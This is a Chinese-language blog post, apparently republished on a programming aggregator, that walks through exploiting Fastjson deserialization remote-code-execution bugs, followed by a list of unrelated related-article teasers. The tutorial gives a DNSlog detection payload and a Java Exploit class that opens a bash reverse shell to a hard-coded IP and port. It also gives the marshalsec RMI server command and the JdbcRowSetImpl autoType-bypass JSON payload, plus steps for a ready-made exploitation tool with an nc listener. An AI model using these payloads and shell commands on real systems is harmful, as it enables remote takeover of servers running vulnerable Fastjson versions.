Fastjson漏洞

Fastjson概述
Fastjson是阿里巴巴公司开源的一款json解析器,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到JavaBean。

➢历史漏洞
Fastjson <=1.2.24 反序列化远程命令执行漏洞
Fastjson <=1.2.41 反序列化远程命令执行漏洞
Fastjson <=1.2.42 反序列化远程命令执行漏洞
Fastjson <=1.2.43 反序列化远程命令执行漏洞
Fastjson <=1.2.45 反序列化远程命令执行漏洞
Fastjson <=1.2.47 反序列化远程命令执行漏洞
Fastjson <=1.2.62 反序列化远程命令执行漏洞
Fastjson <=1.2.66 反序列化远程命令执行漏洞

➢ Fastjson1.2.47反序列化漏洞
1.2.24:fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
1.2.47:fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

➢ Fastjson寻找
fastjson的作用是用于对JSON格式的数据进行解析和打包,所以出现json格式的地方就有可能使用了fastjson
在这里插入图片描述
➢ Json认识

{
"name":"smith".
"age":28,
"sex":"男"
"school":{
"sname":"南京大学".
"address":"南京市鼓楼区汉口路22号"
}
}
{"name":"smith","empno":1001,"job":"clerck","sal":9000.00,"comm":5000.00}

➢ Fastjson漏洞发现(利用 dnslog)

{"name":{"@type":"java.net.InetAddress","val":"test.sr3uwk.ceye.io"}}

在这里插入图片描述
➢ Fastjson的利用(编译)
新建Exploit.java
内容为:https://cowtransfer.com/s/7841d5d6121747
然后cmd下执行:javac Exploit.java,就会生成一个class文件

//javac Exploit.java
import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
public Exploit(){
try{
Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i &gt;&
/dev/tcp/139.9.198.30/6666 0&gt;&1");
}catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Exploit e = new Exploit();
}
}

➢ Fastjson的利用
把编译好的class文件传到外网系统中,可以访问验证一下是否开启,是否把class文
件放进入,
项目地址:https://github.com/mbechler/marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer
“http://139.9.198.30/2/#Exploit” 1234

在这里插入图片描述
➢ Fastjson的利用
执行攻击payload:

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"
b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://139.9.1
98.30:1234/Exploit","autoCommit":true}}

➢ Fastjson的利用(反弹 shell)在这里插入图片描述
在这里插入图片描述
➢ Fastjson的利用(简捷)
项目地址:
https://github.com/Betsy0/fastjson_rce_tool

➢ Fastjson的利用(简捷)
java -cp fastjson_tool.jar fastjson.HRMIServer 139.9.198.30 1234 "要执行的命
令“
编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html在这里插入图片描述
➢ Fastjson的利用(简捷)
生成payload在这里插入图片描述
➢ Fastjson的利用(简捷)
Nc监听端口,并将生成的payload执行在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/358080.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

我是如何用Jquery实现网页缩小放大的

我是如何用Jquery实现网页缩小放大的

背景:一个比较老的后台系统,客户想操作父窗口的内容,同时查看子窗口,这就需要对页面进行缩小和放大,刚开始领导让我做一个假的隐藏然后缩放,经过测试此法不通,因为这个项目很庞大,框架较老,还有蒙版,使用隐藏hide()属性隐藏后,这个网页就不见了,在N个另一个页面加s…
阅读更多...
浅谈哈希表

浅谈哈希表

1. 引言 哈希表&#xff08;Hash Table&#xff09;的应用近两年才在NOI中出现&#xff0c;作为一种高效的数据结构&#xff0c;它正在竞赛中发挥着越来越重要的作用。 哈希表最大的优点&#xff0c;就是把数据的存储和查找消耗的时间大大降低&#xff0c;几乎可以看 成是常数时…
阅读更多...
什么是分配率?

什么是分配率?

诸如“不可持续的分配率”和“您需要保持较低的分配率”等短语似乎仅属于Java Champions的词汇表。 复杂&#xff0c;恐怖并被魔术光环包围。 经常发生的情况是&#xff0c;当您更仔细地查看概念时&#xff0c;魔术会随着抽烟消失。 这篇文章试图从提到的条款中删除魔术。 什…
阅读更多...
流量分析----CTF题

流量分析----CTF题

文章目录 题目背景一、关卡列表二、解题1. 请分析流量&#xff0c;给出黑客使用的扫描器2. 请分析流量&#xff0c;得到黑客扫描到的登陆后台是(相对路径即可)3. 请分析流量&#xff0c;得到黑客使用了什么账号密码登陆了web后台(形式:username/password)4. 请分析流量&#x…
阅读更多...
一文教你从零开始设计并实现一个Java扫雷游戏

一文教你从零开始设计并实现一个Java扫雷游戏

背景&#xff1a;扫雷这款游戏有着很长的历史&#xff0c;从扫雷被开发出来到现在进行了无数次的优化&#xff0c;这款游戏变得越来越让人爱不释手了&#xff0c;简单的玩法在加上一个好看的游戏界面&#xff0c;每一处的细节都体现了扫雷的魅力。以JAVA语言作为开发环境&#…
阅读更多...
C#循环语句(for循环)

C#循环语句(for循环)

循环语句 for(初始条件&#xff1b;循环条件&#xff1b;状态改变) { 循环体 &#xff1b;执行代码&#xff08;break跳出循环体&#xff09; } for(i1&#xff1b;i<100;i) 初始条件是i1;循环条件是i<100,即直到i在1-100之内进行循环&#xff0c;直到100结束循环&#x…
阅读更多...
Apache Shiro 认证绕过漏洞 CVE-2020-1957 漏洞复现

Apache Shiro 认证绕过漏洞 CVE-2020-1957 漏洞复现

Apache Shiro 认证绕过漏洞 CVE-2020-1957 漏洞复现 一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现 四、漏洞POC五、参考链接 一、漏洞描述 Apache Shiro 是一款开源安全框架&#xff0c;提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用&#xff…
阅读更多...
H5工程师在谷歌浏览器调试并开发原生APP项目的解决办法

H5工程师在谷歌浏览器调试并开发原生APP项目的解决办法

背景:项目是前后端分离,我想在浏览器调试项目,工具使用HB-X。密码是不可输入状态。 1.login.html在HB-X中运行到谷歌浏览器页面 。按F12进入调试模式。 2.密码做了安全防御,不能直接输入,我们在控制台进入。定位到password的id。
阅读更多...
在NSUserDefaults中存储自定义类型的数据

在NSUserDefaults中存储自定义类型的数据

将自定义的类的数据以数组的形式直接存储到NSUserDefaults中会报错&#xff0c;需要进行转换&#xff0c;且需要将该类实现NSCoding协议。 e.g. 存储过程 NSMutableArray *archiveArr [NSMutableArray arrayWithCapacity:self.STNArrayList.count];for (STNArrayList *singleL…
阅读更多...
「Java代码审计」华夏ERP3.0代码审计

「Java代码审计」华夏ERP3.0代码审计

本文转载于&#xff1a;https://blog.csdn.net/Ananas_Orangey/article/details/120340010?ops_request_misc%257B%2522request%255Fid%2522%253A%2522166565951516782427492557%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id166…
阅读更多...
vue路由的钩子函数有哪些?都做了哪些事情?

vue路由的钩子函数有哪些?都做了哪些事情?

Vue Router 是 Vue.js 官方的路由管理器。它和 Vue.js 的核心深度集成,让构建单页面应用变得易如反掌。包含的功能有: 嵌套的路由/视图表模块化的、基于组件的路由配置路由参数、查询、通配符基于 Vue.js 过渡系统的视图过渡效果细粒度的导航控制带有自动激活的 CSS class 的…
阅读更多...
api中重载函数的原理_小心重载API方法

api中重载函数的原理_小心重载API方法

api中重载函数的原理重载方法是API设计中的一个重要概念&#xff0c;尤其是当您的API是流利的API或DSL&#xff08; 特定于域的语言 &#xff09;时。 对于jOOQ就是这种情况&#xff0c;在这种情况下&#xff0c;您经常想使用与完全相同的方法名称来与库进行各种交互。 示例&a…
阅读更多...
自动计算高度的方法 iOS, height为0, 可以自动计算weith,

自动计算高度的方法 iOS, height为0, 可以自动计算weith,

height为0, 可以自动计算weith; weith为0, 可以自动计算height, 两者不可以同时为0 NSDictionary *dic {NSFontAttributeName: [UIFont systemFontOfSize:17]}; CGRect rect [joke.content boundingRectWithSize:CGSizeMake(375 - 20, 0) options:(NSStringDrawingUsesFontLe…
阅读更多...
Fastjson 1.2.22-24 反序列化漏洞分析

Fastjson 1.2.22-24 反序列化漏洞分析

Fastjson 1.2.22-24 FastJson在 1.2.22 - 1.2.24 版本中存在反序列化漏洞&#xff0c;主要原因FastJson支持的两个特性&#xff1a; fastjson反序列化时&#xff0c;JSON字符串中的 type 字段&#xff0c;用来表明指定反序列化的目标恶意对象类。 fastjson反序列化时&#xf…
阅读更多...
new操作符具体都干了什么?一次笔试题遇到的

new操作符具体都干了什么?一次笔试题遇到的

背景&#xff1a;一个笔试题简答谈到new操作符都干了什么&#xff1f;连续两次遇到&#xff0c;总结一下&#xff0c;不然不会的还是不会 new 共经过了4个阶段:1.创建一个空对象 let obj new Object();2.链接到原型 把 obj 的proto 指向构造函数Func的原型对象 prototype&am…
阅读更多...
检测到堆栈粉碎

检测到堆栈粉碎

我敢打赌&#xff0c;每一个Java开发人员在他们的职业生涯初期都首次在Java代码中遇到本机方法时都会感到惊讶。 我还可以肯定&#xff0c;多年来随着了解JVM如何通过JNI处理对本机实现的调用而使惊喜消失了。 这篇文章是关于本机方法的最新经验。 更详细地讲&#xff0c;使用…
阅读更多...
关于mysql中外键关联的一些个人理解

关于mysql中外键关联的一些个人理解

在我看来hibernate最麻烦的一件事就是配置外键关联&#xff0c;稍微不慎就会出现配置错误的情况&#xff0c;现在的项目全部都是在使用mybaits&#xff0c;而mybaits使用就简单的多&#xff0c;起码虽然说是要自己写mysql语句&#xff0c;但是起码这种做法在现阶段的项目开发中…
阅读更多...
fastjson反序列化分析

fastjson反序列化分析

1.fastjson简单使用 User: package com.naihe;public class User {private String name;private int age;public User() {}public User(String name, int age) {this.name name;this.age age;}public String getName() {return name;}public void setName(String name) {th…
阅读更多...
防抖函数的实现

防抖函数的实现

防抖函数的定义是当事件触发完成之后再延迟触发&#xff0c;并且只触发一次&#xff1b;如果在触发完成之前再次触发&#xff0c;则会再次刷新延迟&#xff1b;简单理解为&#xff08;如果事件不触发即不执行&#xff0c;并且只会执行一次&#xff0c;就是定时器最后走的那一次…
阅读更多...
银行家算法:解决多线程死锁问题

银行家算法:解决多线程死锁问题

死锁&#xff1a; 死锁产生的现场&#xff1a;当A进程P S2信号量而B进程P S1信号量时就会产生死锁&#xff0c;因为S2信号量需要B进程释放&#xff0c;而S1信号量需要A进程释放&#xff0c;因此两个进程都在等相互的资源&#xff0c;造成死锁。 死锁产生的条件&#xff1a; 互斥…
阅读更多...
最新文章

Copyright @ 2022~2023